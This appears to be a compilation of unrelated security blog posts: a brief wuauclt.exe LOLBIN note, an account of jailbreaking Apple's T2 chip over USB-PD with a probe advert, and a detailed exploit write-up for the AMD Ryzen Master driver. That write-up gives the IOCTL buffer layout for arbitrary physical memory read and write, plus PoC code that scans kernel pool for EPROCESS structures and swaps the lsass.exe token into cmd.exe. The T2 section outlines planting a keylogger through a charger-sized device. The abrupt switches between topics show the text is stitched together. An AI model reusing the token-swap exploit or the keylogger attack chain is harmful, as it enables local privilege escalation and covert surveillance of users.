It’s been a few months since my last post about uploading and downloading data with certreq.exe as a potential alternative to certutil.exe in LOLBIN land. I’ve been having a blast starting my new role in the MDSec ActiveBreach team.
Today I wanted to share something a little more juicy. Enter the ‘WSUS Useful Client’ as they describe here. The Windows Update client (wuauclt.exe) is a bit elusive, with only a small number of Microsoft articles about it [1][2], and these articles do not seem to document all of the available command line options.
This binary lives here:
C:\Windows\System32\wuauclt.exe
I discovered that you can gain code execution by specifying an arbitrary DLL with the following command line options on the test Windows 10 systems I tried (when I get a chance, I will share further details of the methodology I used to find this in a blog post @MDSecLabs):
There’s some fantastic work already in the community for raising the awareness of LOLBINs and for sharing new candidates and their capabilities with the excellent LOLBAS project. I have made the following pull request to this project:
Finally, come and hang out at the RedTeamSec Discord here. It’s been great to see this community grow over the past few months, with some great content being shared.
and the T2
For those just joining us, news broke last week about the jailbreaking of Apple’s T2 security processor in recent Macs. If you haven’t read it yet, you can catch up on the story here, and try this out yourself at home using the latest build of checkra1n. So far we’ve stated that you must put the computer into DFU before you can run checkra1n to jailbreak the T2, and that remains true. Today, however, we are introducing a demo of replacing a target Mac’s EFI and releasing details on the T2 debug interface.
A Monkey by any Other Name
In order to build their products, Apple, unlike app developers, has to debug the core operating system. This is how firmware, the kernel and the debugger itself are built and debugged. From the earliest days of the iPod, Apple has built specialized debug probes for building their products. These devices have leaked from Apple headquarters and their factories and have traditionally had monkey-related names such as the “Kong”, “Kanzi” and “Chimp”. They work by allowing access to special debug pins of the CPU (which for ARM devices is called Serial Wire Debug or SWD), as well as other chips via JTAG and UART. JTAG is a powerful protocol allowing direct access to the components of a device, and access generally provides the ability to circumvent most security measures. Apple has even spoken about their debug capabilities in a BlackHat talk describing the security measures in effect. Apple has even deployed versions of these to their retail locations, allowing for repair of their iPads and Macs.
The Bonobo in the Myst
Another hardware hacker and security researcher, Ramtin Amin, did work last year to create an effective clone of the Kanzi cable. This, combined with the checkm8 vulnerability from axi0mX, allows the iPhone 5s through X to be debugged.
The USB port on the Mac
One of the interesting questions is how the Mac shares a USB port between both the Intel CPU (macOS) and the T2 (bridgeOS) for DFU.
These are essentially separate computers inside of the case sharing the same pins. Schematics of the MacBook leaked from Apple’s vendors (a quick search with a part number and “schematic”), and analysis of the USB-C firmware update payload show that there is a component on each port which is tasked with both multiplexing (allowing the port to be shared) as well as terminating USB power delivery (USB-PD) for the charging of the MacBook or connected devices. Further analysis shows that this port is shared between the following:
The Thunderbolt controller, which allows the port to be used by macOS as Thunderbolt, USB3 or DisplayPort
The T2 USB host for DFU recovery
Various UART serial lines
The debug pins of the T2
The debug pins of the Intel CPU for debugging EFI and the kernel of macOS
Like the above documentation related to the iPhone, the debug lanes of a Mac are only available if enabled via the T2. Prior to the checkm8 bug this required a specially signed payload from Apple, meaning that Apple has a skeleton key to debug any device including production machines. Thanks to checkm8, any T2 can be demoted, and the debug functionality can be enabled. Unfortunately Intel has placed large amounts of information about the Thunderbolt controllers and protocol under NDA, meaning that it has not been properly researched, leading to a string of vulnerabilities over the years.
The USB-C Plug and USB-PD
Given that the USB-C port on the Mac does many things, it is necessary to indicate to the multiplexer which device inside the Mac you’d like to connect to. The USB-C port specification provides pins for this exact purpose (CC1/CC2), which also detect the orientation of the cable, allowing it to be reversible. On top of the CC pins runs another low speed protocol called USB-PD or USB power delivery. It is primarily used to negotiate power requirements between chargers (sources) and devices (sinks). USB-PD also allows for arbitrary packets of information in what are called “Vendor Defined Messages” or VDMs.
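To make the VDM idea a little more concrete, here is a minimal sketch of how the 32-bit header of an unstructured VDM is packed according to the USB-PD specification: the upper 16 bits carry the vendor ID, bit 15 selects structured versus unstructured, and the lower 15 bits are left to the vendor. The function names and the `vendorBits` parameter are hypothetical, and Apple's USB vendor ID (0x05AC) is used purely as an example value; the actual payloads discussed in this post are not reproduced here.

```cpp
#include <cstdint>

// Assumption: Apple's USB vendor ID, used here only as an example value.
constexpr std::uint16_t kExampleVendorId = 0x05AC;

// Pack the header of an unstructured VDM:
//   bits 31..16  vendor ID
//   bit  15      VDM type (0 = unstructured, 1 = structured)
//   bits 14..0   available for vendor use
constexpr std::uint32_t makeUnstructuredVdmHeader(std::uint16_t vendorId,
                                                  std::uint16_t vendorBits) {
    return (static_cast<std::uint32_t>(vendorId) << 16) |
           (static_cast<std::uint32_t>(vendorBits) & 0x7FFFu);
}

// True when bit 15 marks the message as a structured VDM.
constexpr bool isStructuredVdm(std::uint32_t header) {
    return (header & 0x8000u) != 0;
}
```

Masking `vendorBits` with 0x7FFF keeps bit 15 clear, so a header built this way is always reported as unstructured.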
Apple’s USB-PD Extensions
The VDM allows Apple to trigger actions and specify the target of a USB-C connection. We have discovered USB-PD payloads that cause the T2 to be rebooted and the T2 to be held in a DFU state. Putting these two actions together, we can cause the T2 to restart ready to be jailbroken by checkra1n without any user interaction. While we haven’t tested an Apple Serial Number Reader, we suspect it works in a similar fashion, allowing the device’s ECID and Serial Number to be read from the T2’s DFU reliably. The Mac also speaks USB-PD to other devices, such as when an iPad Pro is connected in DFU mode. Apple needs to document the entire set of VDM messages used in their products so that consumers can understand the security risks. The set of commands we issue is unauthenticated, and even if the commands were authenticated, they are undocumented and thus unreviewed. Apple could have prevented this scenario by requiring some physical attestation during these VDMs, such as holding down the power button at the same time.
Putting it Together
Taking all this information into account, we can string it together to reflect a real world attack. By creating a specialized device about the size of a power charger, we can place a T2 into DFU mode, run checkra1n, replace the EFI and upload a key logger to capture all keys. This is possible even though macOS is un-altered (the logo at boot is for effect but need not be done). This is because in Mac portables the keyboard is directly connected to the T2 and passed through to macOS.
VIDEO DEMO PlugNPwn is the entry into DFU directly from connecting a cable to the DFU port (if it doesn’t show, it may be your AdBlock: https://youtu.be/LRoTr0HQP1U)
PlugN’Pwn Automatic Jailbreak In the next video we use
In order to facilitate further research on the topic of USB-PD security, and to allow users at home to perform similar experiments, we are pleased to announce pre-ordering of our USB-PD screamer. It allows a computer to directly “speak” USB-PD to a target device. Get more info here:
This miniature USB-to-Power Delivery adapter lets you experiment with the USB Power Delivery protocol and discover hidden functionality in various Type-C devices.
Capabilities you might discover include but are not limited to serial ports, debug ports (SWD, JTAG, etc.), automatic restart, automatic entry to firmware update boot-loader.
Tested to work with Apple Type-C devices such as iPad Pro and MacBook (T1 and T2) to expose all functionality listed above (SWD does not work on iPad because no downgrade is available).
WARNING! This probe is NOT an SWD/Serial probe by itself. It only allows you to send needed PD packets to mux SWD/Serial out and exposes it on the test pads. If you want to use SWD/Serial, you WILL need another SWD/Serial probe/adapter upstream connected to the test pads.
ABSOLUTELY NOT for experiments with 9/15/20v or anything other than 5v.
Only for arbitrary PD messages.
Dimensions: 10x15mm (excluding type-c plug)
Connectivity: USB to control custom PD messages, test points for USB-Top, USB-Bottom, and SBU lines for connection to upstream devices to utilize the exposed functionality.
Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn. Eventually I went bug hunting on my own.
I ended up discovering what could be described as a logic bug in the ATI Technologies Inc. driver ‘atillk64.sys’. Being new to the Windows driver bug hunting space, I didn’t realize that this driver had already been analyzed and classified as vulnerable by Jesse Michael and his colleague Mickey in their ‘Screwed Drivers’ github repo. It had also been mentioned in several other places that have been pointed out to me since.
So I didn’t really feel like I had discovered my first real bug and decided to hunt similar bugs on Windows 3rd party drivers until I found my own in the AMD Ryzen Master AMDRyzenMasterDriver.sys version 15.
I have since stopped looking for these types of bugs as I believe they wouldn’t really help me progress skills wise and my goals have changed since.
Thanks
Huge thanks to the following people for being so charitable, publishing things, messaging me back, encouraging me, and helping me along the way:
The AMD Ryzen Master Utility is a tool for CPU overclocking. The software purportedly supports a growing list of processors and allows users fine-grained control over the performance settings of their CPU. You can read about it here
This vulnerability is extremely similar to my last Windows driver post, so please give that a once-over if this one lacks any depth and leaves you curious. I will try my best to limit the redundancy with the previous post.
All of my analysis was performed on Windows 10 Build 18362.19h1_release.190318-1202.
I picked this driver as a target because it is common for 3rd-party Windows drivers responsible for hardware configuration or diagnostics to expose powerful routines that directly read from or write to physical memory to low-privileged users.
Checking Permissions
The first thing I did after installing AMD Ryzen Master using the default installer was to locate the driver in OSR’s Device Tree utility and check its permissions. This is the first thing I was checking during this period because I had read that Microsoft did not consider a violation of the security boundary between Administrator and SYSTEM to be a serious violation. I wanted to ensure that my targets were all accessible from lower privileged users and groups.
Luckily for me, Device Tree indicated that the driver allowed all Authenticated Users to read and modify the driver.
Finding Interesting IOCTL Routines
Write What Where Routine
Next, I started looking at the driver in a free version of IDA. A search for MmMapIoSpace returned quite a few places in which the API was cross-referenced. I just began going down the list to see what code paths could reach these calls.
The first result, sub_140007278, looked very interesting to me.
We don’t know at this point if we control the API parameters in this routine, but looking at the routine statically you can see that we make our call to MmMapIoSpace, it stores the returned pointer value in [rsp+48h+BaseAddress], and it does a check to make sure the return value was not NULL. If we have a valid pointer, we then progress into this loop routine on the bottom left.
At the start of the looping routine, we can see that eax gets the value of dword ptr [rsp+48h+NumberOfBytes] and then we compare eax to [rsp+48h+var_24]. This makes some sense because we already know from looking at the API call that [rsp+48h+NumberOfBytes] held the NumberOfBytes parameter for MmMapIoSpace. So essentially this looks like a check to see if a counter variable has reached our NumberOfBytes value. A quick highlight of eax shows that later it takes on the value of [rsp+48h+var_24], is incremented, and then eax is put back into [rsp+48h+var_24]. Then we’re back at the top of our loop where eax is set equal to NumberOfBytes before every check.
So this looked interesting to me: we can see that we’re doing something in a loop, byte by byte, until our NumberOfBytes value is reached. Once that value is reached, the other branch of the loop is a call to MmUnmapIoSpace.
Looking a bit closer at the loop, we can see a few interesting things. ecx is essentially a counter here as it’s set equal to our already mentioned counters eax and [rsp+48h+var_24]. We also see there is a mov to [rdx+rcx] from al. A single byte is written to the location of rdx + rcx. So we can make a guess that rdx is a base address and rcx is an offset. This is what a traditional for loop would seem to look like disassembled. al is taken from another similar construction in [r8+rax] where rax is now acting as the offset and r8 is a different base address.
So all in all, I decided this looks like a routine that is most likely doing either a byte by byte read or a byte by byte write to kernel memory. But if you look closely, you can see that the pointer returned from MmMapIoSpace is the one that al is written to (while tracking an offset) because it is eventually moved into rdx for the mov [rdx+rcx], al operation. This was exciting for me because if we can control the parameters of MmMapIoSpace, we will possibly be able to specify a physical memory address and length and copy a user controlled buffer into that space once it is mapped into virtual memory. This is essentially a write what where primitive!
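As a rough illustration of what the disassembled loop appears to be doing, here is a minimal C++ sketch. It is a hypothetical reconstruction, not the driver's source: `mapped` stands in for the pointer returned by MmMapIoSpace (the rdx base), `userBuffer` for the second base address (r8), and `numberOfBytes` for the value held in [rsp+48h+NumberOfBytes].

```cpp
#include <cstdint>

// Hypothetical reconstruction of the loop seen in the disassembly.
// The counter plays the role of [rsp+48h+var_24] and is compared
// against numberOfBytes before every iteration.
inline void copyByteByByte(std::uint8_t* mapped,
                           const std::uint8_t* userBuffer,
                           std::uint32_t numberOfBytes) {
    for (std::uint32_t i = 0; i < numberOfBytes; ++i) {
        // Roughly: mov al, [r8+rax] followed by mov [rdx+rcx], al
        mapped[i] = userBuffer[i];
    }
}
```

Swapping the roles of the two pointers gives the read variant, which is why the two routines look so alike in a disassembler.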
Looking at the first cross-reference to this routine, I started working my way back up the call graph until I was able to locate a probable IOCTL code.
After banging my head against my desk for hours trying to pass all of the checks to reach our glorious write what where routine, I was finally able to reach it and get a reliable BSOD. The checks were looking at the sizes of the input and output buffers supplied to my DeviceIoControl call. I was able to solve this by simply stringing together random length buffers of something like AAAAAAAABBBBBBBBCCCCCCCC etc., and seeing how the program would parse my input. Eventually I was able to figure out that the input buffer was structured as follows:
the first 8 bytes of my input buffer would be the desired physical address you want mapped,
the next 4 bytes would represent the NumberOfBytes parameter,
and finally, and this is what took me the longest, the next 8 bytes were to be a pointer to the buffer you wanted to overwrite the mapped kernel memory with.
Very cool! We have control over all the MmMapIoSpace params except CacheType and we can specify what buffer to copy over!
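The input layout described above can be sketched as a packed struct. The struct and field names here are hypothetical (the driver's real definitions are not public), the layout is inferred only from the 8 + 4 + 8 byte description, and a 64-bit process is assumed so that a pointer fits the final 8 bytes.

```cpp
#include <cstddef>
#include <cstdint>

#pragma pack(push, 1)
// Hypothetical view of the write IOCTL input buffer.
struct WriteRequest {
    std::uint64_t physicalAddress; // bytes 0..7:   physical address to map
    std::uint32_t numberOfBytes;   // bytes 8..11:  NumberOfBytes for MmMapIoSpace
    std::uint64_t sourceBuffer;    // bytes 12..19: pointer to the data to copy
};
#pragma pack(pop)

static_assert(sizeof(WriteRequest) == 20, "layout must be 8 + 4 + 8 bytes");
static_assert(offsetof(WriteRequest, numberOfBytes) == 8, "length follows address");
static_assert(offsetof(WriteRequest, sourceBuffer) == 12, "pointer follows length");

// Fill in a request; `source` is the user buffer the driver would copy from.
inline WriteRequest makeWriteRequest(std::uint64_t physicalAddress,
                                     std::uint32_t numberOfBytes,
                                     const void* source) {
    WriteRequest request{};
    request.physicalAddress = physicalAddress;
    request.numberOfBytes = numberOfBytes;
    request.sourceBuffer =
        static_cast<std::uint64_t>(reinterpret_cast<std::uintptr_t>(source));
    return request;
}
```

Packing matters here: without it the compiler would pad the 4-byte length out to 8 bytes and the pointer would land at offset 16 instead of 12.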
This is progress, I was fairly certain at this point I had a write primitive; however, I wasn’t exactly sure what to do with it. At this point, I reasoned that if a routine existed to do a byte by byte write to a kernel buffer somewhere, I probably also had the ability to do a byte by byte read of a kernel buffer. So I set out to find my routine’s sibling, the read what where routine (if she existed).
Read What Where
Now I went back to the other cross references of MmMapIoSpace calls and eventually came upon this routine, sub_1400063D0.
You’d be forgiven if you think it looks just like the last routine we analyzed, I know I did and missed it initially; however, this routine differs in one major way. Instead of copying byte by byte out of our process space buffer and into a kernel buffer, we are copying byte by byte out of a kernel buffer and into our process space buffer. I will spare you the technical analysis here but it is essentially our other routine except only the source and destinations are reversed! This is our read what where primitive and I was able to back track a cross reference in IDA to this IOCTL.
There were a lot of rabbit holes here to go down but eventually this one ended up being straightforward once I found a clear cut code path to the routine from the IOCTL call graph.
Once again, we control the important MmMapIoSpace parameters and, this is a difference from the other IOCTL, the byte by byte transfer occurs in our DeviceIoControl output buffer argument at an offset of 0xC bytes. So we can tell the driver to read physical memory from an arbitrary address, for an arbitrary length, and send us the results!
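Since the copied bytes land 0xC bytes into the output buffer, a caller has to size the buffer accordingly and skip that prefix when consuming the result. A minimal sketch of that bookkeeping, with hypothetical helper names and no actual driver call:

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Offset inside the output buffer where the copied bytes begin (from the text).
constexpr std::size_t kReadDataOffset = 0xC;

// Size the output buffer must have to receive `bytesWanted` bytes of data.
constexpr std::size_t outputSizeFor(std::size_t bytesWanted) {
    return bytesWanted + kReadDataOffset;
}

// Return only the copied bytes, dropping the 0xC-byte prefix.
inline std::vector<std::uint8_t> extractReadData(
        const std::vector<std::uint8_t>& outputBuffer) {
    if (outputBuffer.size() <= kReadDataOffset) {
        return {};
    }
    return std::vector<std::uint8_t>(
        outputBuffer.begin() + static_cast<std::ptrdiff_t>(kReadDataOffset),
        outputBuffer.end());
}
```

For a full 0x1000-byte page this gives an output size of 0x100c.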
With these two powerful primitives, I tried to recreate my previous exploitation strategy employed in my last post.
Exploitation
Here I will try to walk through some code snippets and explain my thinking. Apologies for any programming mistakes in this PoC code; however, it works reliably on all the testing I performed (and it worked well enough for AMD to patch the driver.)
First, we’ll need to understand what I’m fishing for here. As I explained in my previous post, I tried to employ the same strategy that @b33f did with his driver exploit and fish for "Proc" tags in the kernel pool memory. Please refer to that post for any questions here. The TL;DR here is that information about processes is stored in the EPROCESS structure in the kernel and some of the important members for our purposes are:
ImageFileName (this is the name of the process)
UniqueProcessId (the PID)
Token (this is a security token value)
The offsets from the beginning of the structure to these members were as follows on my build:
Each data structure in the kernel pool has various headers (thanks to ReWolf for breaking this down so well):
POOL_HEADER structure (this is where our "Proc" tag will reside),
OBJECT_HEADER_xxx_INFO structures,
OBJECT_HEADER, which contains a Body where the EPROCESS structure lives.
As b33f explains in his write-up, all of the addresses where one begins looking for a "Proc" tag are 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4, that is where a "Proc" tag might be.
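The alignment rule above translates into a very simple scan over a buffer of memory that has already been read. The sketch below is an illustration under those stated assumptions only, not the PoC's code: it walks a buffer in 0x10 steps and records every offset where the four bytes at +0x4 spell "Proc". The function name is hypothetical.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Return every 0x10-aligned offset in `page` whose bytes at +0x4 are "Proc".
inline std::vector<std::size_t> findProcTagOffsets(
        const std::vector<std::uint8_t>& page) {
    static const char kTag[4] = {'P', 'r', 'o', 'c'};
    std::vector<std::size_t> hits;
    // Stop once fewer than 8 bytes remain so the tag read stays in bounds.
    for (std::size_t base = 0; base + 8 <= page.size(); base += 0x10) {
        if (std::memcmp(page.data() + base + 4, kTag, sizeof(kTag)) == 0) {
            hits.push_back(base);
        }
    }
    return hits;
}
```

A tag that sits anywhere other than 0x4 past a 0x10 boundary is ignored, which keeps the scan cheap but means a hit still needs to be validated against the expected EPROCESS members.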
Leveraging Read What Where
The difficulty on my Windows build was that the distance from my "Proc" tag, once found, to the beginning of the EPROCESS structure, where I know the offsets to the members I want, varied wildly. So much so that in order to get the exploit working reliably, I simply had to create my own data structure, PROC_DATA, and store the values for every hit in its vectors. This excerpt from the scanning loop shows how its members are filled in:
                // This address might not be page-aligned to 0x1000
                // so find out how far off from a multiple of
                // 0x1000 we are. This value is stored in our
                // PROC_DATA struct in the page_entry_offset
                // member.
                INT64 modulus = temp_addr % 0x1000;
                proc_data.page_entry_offset.push_back(modulus);
                // This is the page-aligned address where, either
                // small or large paged memory will hold our "Proc"
                // chunk. We store this as our proc_address member
                // in PROC_DATA.
                INT64 page_address = temp_addr - modulus;
                proc_data.proc_address.push_back(page_address);
                proc_data.header_size.push_back(x);
            }
        }
    }
}
It will be more obvious with the entire exploit code, but what I’m doing here is basically starting from a physical address and calling our read what where with a read size of 0x100c (0x1000 + 0xc, as required so we can capture a whole page of memory and still keep our returned metadata information that starts at offset 0xc in our output buffer) in a loop, all the while adding these discovered PROC_DATA structures to a vector. Once we hit our max address or max iterations, we’ll send this vector over to a second routine that parses out all the data we care about, like the EPROCESS members.
It is important to note that I took great care to make sure that all calls to MmMapIoSpace used page-aligned physical addresses, as this is the most stable way to call the API.
Now that I knew exactly how many "Proc" chunks I had found and stored all their relevant metadata in a vector, I could start a second routine that would use that metadata to check for their EPROCESS member values to see if they were processes I cared about.
My strategy here was to find the EPROCESS members for a privileged process such as lsass.exe and swap its security token with the security token of a cmd.exe process that I owned. You can see a portion of that code here:
if (system_tokens.token_name.size() != 0 && cmd_token_address != 0) {
    cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
    cout << "[>] Let's swap tokens!\n";
}
else if (cmd_token_address == 0) {
    cout << "[!] No cmd.exe token address found, exiting...\n";
    exit(1);
}
So now at this point I had the location and values of everything I cared about and it was time to leverage the Write What Where routine we had found.
Leveraging Write What Where
The problem I was facing was that I need my calls to MmMapIoSpace to be page-aligned so that the calls remain stable and we don’t get any unnecessary BSODs.
So let’s picture a page of memory as a line.
<—————–MEMORY PAGE—————–>
We can only write in page-size chunks; however, the value we want to overwrite, the value of the cmd.exe process’s Token, is most likely not page-aligned. So now we have this:
<———TOKEN——————————->
I could do a direct write at the exact address of this Token value, but my call to MmMapIoSpace would not be page-aligned.
So what I did was one more Read What Where call to store everything on that page of memory in a buffer, then overwrite the cmd.exe Token in that buffer with the lsass.exe Token, and then use that buffer in my call to the Write What Where routine.
So instead of an 8 byte write to simply overwrite the value, I’d be opting to completely overwrite that entire page of memory but only changing 8 bytes, that way the calls to MmMapIoSpace stay clean.
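The read-modify-write idea can be sketched in isolation from the driver calls. In the hypothetical helper below, `page` is assumed to hold a copy of the page obtained from the read primitive, `tokenOffset` is how far into the page the cmd.exe Token sits, and `newToken` is the value taken from the privileged process. Only those 8 bytes change, and the whole buffer would then be handed to the write primitive.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Overwrite 8 bytes of a previously read page copy with a new token value.
// Returns false if the token would not fit inside the buffer.
inline bool patchTokenInPage(std::vector<std::uint8_t>& page,
                             std::size_t tokenOffset,
                             std::uint64_t newToken) {
    if (tokenOffset > page.size() ||
        page.size() - tokenOffset < sizeof(newToken)) {
        return false;
    }
    std::memcpy(page.data() + tokenOffset, &newToken, sizeof(newToken));
    return true;
}
```

Because every other byte in the buffer is written back exactly as it was read, the trade-off is a short window in which the kernel may have changed the page between the read and the write.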
You can see some of that math in the code snippet below with references to modulus. Remember that the Write What Where utilized the input buffer of DeviceIoControl as the buffer it would copy over into the kernel memory:
if (!DeviceIoControl(
    hFile,
    READ_IOCTL,
    &input_buff,
    0x40,
    output_buff,
    modulus + 0xc,
    &bytes_ret,
    NULL))
{
    cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
    cout << "[!] Last error: " << hex << GetLastError() << "\n";
    exit(1);
}
The PROC_DATA struct used to collect the scan results is defined as follows:
// This struct will hold the address of a "Proc" tag's page entry,
// that Proc chunk's header size, and how far into the page the "Proc" tag is
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};